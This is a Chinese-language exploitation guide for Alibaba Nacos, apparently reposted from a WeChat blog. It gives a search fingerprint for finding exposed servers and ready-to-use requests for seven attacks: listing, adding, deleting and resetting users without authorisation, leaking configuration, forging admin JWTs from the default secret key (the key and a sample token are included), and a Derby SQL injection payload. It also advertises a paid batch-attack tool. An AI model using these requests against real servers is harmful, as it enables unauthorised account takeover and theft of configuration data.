Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
指纹:app="nacos"
默认密码nacos nacos就不说了
漏洞1获取已有的用户列表的账号和密码
在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9
可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图
漏洞2任意用户添加
更改提交方式为POST
, 访问/nacos/v1/auth/users?username=test111&password=123456
新建一个账号test111,可以看到创建用户成功,如图
使用该账号可以发现登录成功,如图
漏洞3任意用户删除
更改提交方式为DELETE
, 访问DELETE /nacos/v1/auth/users?username=test111
可以看到用户删除成功,如图
漏洞4用户密码重置
更改提交方式为PUT,
访问 /nacos/v1/auth/users?accessToken=&username=test1&newPassword=test222
可以看到用户密码更新成功,如图
漏洞5配置信息泄露
在路径后面加上:/n
acos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99
漏洞6 token.secret.key默认配置(QVD-2023-6271)
SecretKey012345678901234567890123456789012345678901234567890123456789
https://jwt.io/
http://shijianchuo.wiicha.com/
在登录请求中,拦截数据包,添加Authorization信息,拦截放回包后放包
Authorization: Bearer 你的token
利用方式2:
{
"accessToken":
"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU","tokenTtl": 18000,
"globalAdmin": true,"username":"nacos"
}
漏洞7 Nacos Derby SQL注入漏洞 (CNVD-2020-67618)
/nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73
批量工具放知识星球
原文始发于微信公众号(丁永博的成长日记):Nacos 漏洞利用姿势大全-附批量工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论